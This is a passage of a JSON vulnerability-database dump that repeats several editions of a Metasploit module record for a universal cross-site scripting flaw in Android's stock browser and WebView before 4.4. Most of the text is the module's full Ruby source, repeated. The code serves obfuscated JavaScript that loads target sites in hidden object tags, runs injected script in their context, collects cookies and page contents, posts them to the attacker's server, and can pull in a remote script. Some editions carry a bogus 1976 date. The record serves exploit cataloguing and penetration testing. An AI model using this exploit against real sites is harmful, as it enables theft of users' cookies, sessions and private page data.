'#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-28T09:52:29", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-28T11:49:17", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-28T11:49:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-28T11:49:17", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-03T14:46:27", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-03T14:46:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-03T14:46:27", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-03T18:04:21", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-03T18:04:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-03T18:04:21", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-07T10:14:19", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-07T10:14:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-07T10:14:19", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-07T14:12:19", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-07T14:12:19"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-07T14:12:19", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-09T10:13:15", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-04-09T10:13:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = 